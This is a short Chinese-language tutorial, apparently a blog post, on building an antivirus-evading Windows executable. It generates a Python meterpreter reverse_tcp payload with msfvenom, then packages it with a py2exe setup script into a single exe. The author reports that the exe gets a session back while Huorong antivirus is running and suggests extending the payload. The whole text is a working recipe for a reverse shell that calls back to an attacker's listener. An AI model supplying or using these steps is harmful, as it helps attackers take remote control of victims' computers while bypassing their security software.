前言

经测试，基于python的免杀工具，只是能起到一个反弹shell的功能，当然拿到shell了，其实也就足够了。

准备

利用msfvenom生成马

msfvenom -p python/meterpreter/reverse_tcp LHOST=监听IP LPORT=监听端口 -f raw -o hackergu.py

准备python脚本

from distutils.core import setup
import py2exe
setup(
name = 'Meter',
description = 'Python-based App',
version = '1.0',
console=['hackergu.py'],
options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
zipfile = None,
)

运行脚本

python2 setup.py py2exe

生成一个exe文件

在开启火绒情况下，成功上线

后续

这里将其命令框写入内存运行完全是ok的，但是我没有再多去研究，可以扩展生成的payload，使其发挥更大的效果。